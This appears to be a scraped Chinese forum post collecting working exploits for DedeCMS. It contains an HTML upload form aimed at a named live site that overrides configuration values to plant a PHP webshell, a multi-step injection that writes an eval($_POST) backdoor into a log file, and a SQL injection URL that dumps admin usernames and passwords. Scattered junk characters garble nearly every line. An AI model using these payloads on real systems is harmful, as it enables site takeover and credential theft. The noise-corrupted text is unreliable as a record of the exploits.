</head>3 E+ n( n. p. k9 D! Q% T
<body style="FONT-SIZE: 9pt">% _0 Y+ R$ b) h" v# G: l3 \% f0 W; P" ~
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
- D/ x! y6 W& @$ C0 E0 y+ [<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>9 @! w1 g; ? B/ h
<input type='hidden' name='activepath' value='/data/cache/' />0 w. q+ x: k8 M* H; Y; L, \/ A
<input type='hidden' name='cfg_basedir' value='../../' />
& E2 I" ~4 {- _ ^<input type='hidden' name='cfg_imgtype' value='php' />
. l3 u5 |, `/ n# n) _4 L<input type='hidden' name='cfg_not_allowall' value='txt' />
& P, t7 n/ ^+ f8 y! L<input type='hidden' name='cfg_softtype' value='php' />
" Q! n; y2 Q! I+ ^8 T4 E<input type='hidden' name='cfg_mediatype' value='php' />
- ~; w3 _( Z; u4 s$ D4 H, _. U) A<input type='hidden' name='f' value='form1.enclosure' />
; I3 u; l3 Y6 |) K, f: `<input type='hidden' name='job' value='upload' />
# M! ?8 e' l9 {& U5 q- E- z<input type='hidden' name='newname' value='fly.php' />
, G* `7 n: v. X/ ]9 w. \6 r* hSelect U Shell <input type='file' name='uploadfile' size='25' /> C! Z6 x4 R: j+ N
<input type='submit' name='sb1' value='确定' />& R4 o; D6 |& _# j8 _3 A* A
</form>8 C/ b+ K+ ]7 a& \6 ^# v- `/ Y, H* X
<br />It's just a exp for the bug of Dedecms V55...<br />5 k' T+ k' D/ M% M9 I
Need register_globals = on...<br /> a& s! ], h0 h5 [
Fun the game,get a webshell at /data/cache/fly.php...<br />
6 x/ _" u' B/ Y9 U</body>2 b8 s. a! K2 ^
</html>, v, w. T6 l w
; L( } o1 | A
O7 H/ i8 d/ u; I& S" B) o3 U
$ Y% ^# ?/ T+ W, l) J/ [. S! t& c2 _4 d% e* y8 e+ [ Q6 {
' C& a* ]9 K' j, N q
0 I- y4 }* Y3 k. _2 P9 {8 ]" p% j4 \+ E$ L) i6 W7 I$ T
% U/ q( r4 K- ]9 d5 Z) {: A* X. k* s5 ^. D
/ x# c. Z7 W% B! G) q' Z! K. W织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞$ T4 i5 K# B! H
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。, W8 T- x6 e$ J! R$ B8 { a/ w
1. 访问网址:
7 o! K! C& m4 C. Y: bhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>" y( x8 q/ B2 P9 W/ Q' |
可看见错误信息
0 Q! }7 X- W$ s% W6 [% `! j6 i* n+ o* C; M W, o5 w
$ x) ?1 z+ L% L& E2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
9 Y7 k) [4 ^& Eint(3) Error: Illegal double '1024e1024' value found during parsing
& u" M x# c- `5 L+ BError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
1 c9 x9 C: a6 T6 ] H% x, B0 V! B- t I) M+ y5 _6 J- C3 G9 |- r
! w9 v9 F" b- z m
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是1 j' o9 n7 }5 \. m: Y- y. I2 a* O
8 R0 m) j7 D0 k% u9 u: P0 {$ {+ F+ u: ?6 c+ c) R/ z2 o6 n- a
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
9 U( ?# K4 R2 H6 F
' b: V6 M3 s" G* t# c+ Q% C: {) i. @' l6 B9 f5 y. Q) l9 O, q9 }8 {* z% z
按确定后的看到第2步骤的信息表示文件木马上传成功." r3 e, _/ @0 m- {8 p! Z" M0 I
' k& |" `: [8 ?( F3 l) K. Z* f* M! W* g' g, Y" z1 N- W
3 k7 g4 G% ]5 F
) B( }0 K' O' I# Z
$ s/ I9 _3 G3 W* N
2 D9 I X1 d, J* Y4 C5 B# ?2 X6 J
" g! p' Y7 y2 ] T; R x5 U; ~( a1 u5 |+ a
l6 b) P& n5 B& U
& R1 A! k+ s0 ], G ]8 Y e# g2 o; U% @* k( Y
% V8 P) h, b6 _, T
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
0 M6 B5 t4 c3 d9 E5 y1 q" U- h9 Jhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对